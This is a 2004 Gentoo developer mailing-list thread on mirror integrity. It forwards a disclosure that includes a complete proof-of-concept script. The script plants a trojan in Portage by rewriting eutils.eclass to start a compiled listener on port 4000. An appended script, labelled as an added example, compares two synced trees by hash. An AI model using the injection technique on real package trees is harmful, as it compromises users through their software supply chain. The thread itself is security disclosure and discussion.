Gentoo Archives: gentoo-dev

From: Ioannis Aslanidis <aslanidis@×××××.com>
To:
Cc: gentoo-dev@l.g.o
Subject: Re: [gentoo-dev] [Fwd: [gentoo-security] Trojan for Gentoo, part 2]
Date: Sat, 06 Nov 2004 22:06:58
Message-Id: ea440b1d0411061406569b0ad4@mail.gmail.com
In Reply to: [gentoo-dev] [Fwd: [gentoo-security] Trojan for Gentoo, part 2] by Joshua Brindle
Then perhaps it's time to have a simple mirror that only serves
portage MD5s, for example :)


On Sat, 06 Nov 2004 15:56:32 -0500, Joshua Brindle <method@g.o> wrote:
> perhaps some motivation for portage devs....
>
> -------- Original Message --------
> Subject: [gentoo-security] Trojan for Gentoo, part 2
> Date: Sat, 06 Nov 2004 21:16:11 +0100
> From: Alexander Holler <holler@××××××××××.de>
> To: gentoo-security@l.g.o
>
> Hi,
>
> after 1.5 years (2 years after the bug could be found in bugzilla) it
> seems that one of the highest security risks is closed. At least I've
> seen something about signed ebuilds. (see
> http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ).
>
> Time for the next part. I've already written a bug for that a year ago,
> but it was now closed a second time by "the ... gatekeeper".
>
> See bug #26110
>
> Here's the next small script. If you are operating a gentoo mirror, or
> having access to one, feel free to play with it.
>
> If you are a user, the only practical way to ensure a minimum of
> security is to sync twice:
> (a) sync,
> (b) delete timestamp,
> (c) sync with other mirror and
> (d) look if no files were different, otherwise restart with (a)
>
> ----------------gentooTrojan.sh---------------------------
> #!/bin/sh
> if [ ${#} -ne 1 ] ; then
>     echo "This script puts a silly trojan into Gentoo's portage."
>     echo "Usage: `basename ${0}` PathToPortage"
>     exit 1
> fi
>
> mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass
> sed -e 's:^epatch().*{:epatch() {\newarn "Starting Trojan.\nTry it with
> telnet localhost 4000.\nKill it with killall
> GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:'
> <${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass
> cat >${1}/eclass/GentooTrojan.c << EOF
> #include <unistd.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> #include <string.h>
>
> int main(void)
> {
>     struct sockaddr_in serv;
>     struct sockaddr_in cli;
>     int sock;
>     sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
>     if (sock < 0)
>         return 1;
>     bzero((char *) &serv, sizeof(serv));
>     serv.sin_family = AF_INET;
>     serv.sin_addr.s_addr = htonl(INADDR_ANY);
>     serv.sin_port = htons(4000);
>     if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0)
>         return 1;
>     if (listen(sock, 5) < 0)
>         return 1;
>     while (1) {
>         int scli;
>         int slen;
>         static char *str="Your are listing to the famous Gentoo trojan!\n";
>         slen = sizeof(cli);
>         scli = accept(sock, (struct sockaddr *) &cli,
>                       (socklen_t *) &slen);
>         write(scli, str, strlen(str));
>         close(scli);
>     }
> }
> EOF
>
> gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c
>
> echo "Done. Portage successful infected with a trojan."
> echo "Just emerge an ebuild which uses epatch and do a"
> echo " telnet localhost 4000"
> echo "afterwards."
> -------------------------------------------
>
> Kind regards,
>
> Alexander Holler
>
> PS: Please don't reply to me, I don't read any Gentoo mailing lists
> anymore, in fact I even don't know why I'm writing this message, as I
> already have lost every interest in Gentoo some time ago.
>
> PPS: Sorry for those hard words, but that all reminds me of Microsoft.
> The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting
> forgotten, ignored or fixed in the same time.
>
> PPPS: I really appreciate all the very good work on hardened gcc,
> selinux-profiles and so on, but for me, this all seems useless as long
> as the base is compromised that easily and the user has no practical way
> (e.g. hashes) to check what he gets on his machine with a 'sync'.
>
> --
> gentoo-security@g.o mailing list
>
> --
> gentoo-dev@g.o mailing list
>
>


--
Ioannis Aslanidis
<deathwing00[at]forums.gentoo.org> 0xC2539DA3
<aioannis[at]tinet.org> 0xF202D067
<dwcommander[at]users.sourceforge.net>

Hellenic Gentoo GNU/Linux project manager (http://hellenicgentoo.sf.net)
FIRECOPS++ project manager (http://firecops.sf.net)
Gentoo Forums Global Moderator (http://forums.gentoo.org)

Computer Engineering student at Universitat Rovira i Virgili

--
gentoo-dev@g.o mailing list
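
The double-sync check from the quoted message (steps (a) to (d)), as an added example that is not part of the original thread: it hashes two copies of a tree synced from different mirrors and lists every path that differs or exists on one side only. The `metadata/timestamp*` exclusion and the sample file names are assumptions made for the example.

```shell
#!/bin/sh
# Added example: compare two copies of a tree synced from different mirrors.

# Print "<sha256>  <path>" for every regular file under $1, sorted.
# metadata/timestamp* is skipped: assumed location of the per-mirror sync
# timestamp, which legitimately differs between mirrors.
tree_manifest() {
    ( cd "$1" || exit 2
      find . -type f ! -path './metadata/timestamp*' -exec sha256sum {} + |
          LC_ALL=C sort )
}

# Print each path that differs or exists in only one tree.
# Returns 0 if the trees match, 1 if they differ, 2 if a tree is unreadable.
compare_trees() {
    m1=$(mktemp) m2=$(mktemp)
    tree_manifest "$1" >"$m1" && tree_manifest "$2" >"$m2" ||
        { rm -f "$m1" "$m2"; return 2; }
    # comm -3 keeps manifest lines unique to one side; strip hash, dedupe paths.
    changed=$(LC_ALL=C comm -3 "$m1" "$m2" |
        sed 's/^[[:space:]]*[0-9a-f]\{64\}  //' | LC_ALL=C sort -u)
    rm -f "$m1" "$m2"
    if [ -n "$changed" ]; then
        printf '%s\n' "$changed"
        return 1
    fi
}

# Constructed sample: two tiny trees, the second altered the way the post
# describes (eutils.eclass rewritten, an extra file dropped into eclass/).
make_sample_trees() {
    base=$(mktemp -d)
    for t in mirror-a mirror-b; do
        mkdir -p "$base/$t/eclass" "$base/$t/metadata"
        echo 'epatch() { :; }' >"$base/$t/eclass/eutils.eclass"
        echo 'inherit eutils' >"$base/$t/eclass/other.eclass"
        echo "synced from $t" >"$base/$t/metadata/timestamp.chk"
    done
    echo 'epatch() { altered; }' >"$base/mirror-b/eclass/eutils.eclass"
    echo 'placeholder' >"$base/mirror-b/eclass/unexpected-file"
    echo "$base"
}

case "${1:-}" in
    "") ;;                                   # no arguments: define functions only
    demo) b=$(make_sample_trees); compare_trees "$b/mirror-a" "$b/mirror-b" ;;
    *) compare_trees "$1" "$2" ;;
esac
```

A match only shows that the two mirrors agree with each other; it says nothing if both carry the same altered files.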

Replies

Subject Author
Re: [gentoo-dev] [Fwd: [gentoo-security] Trojan for Gentoo, part 2] Chris Bainbridge <chris.bainbridge@×××××.com>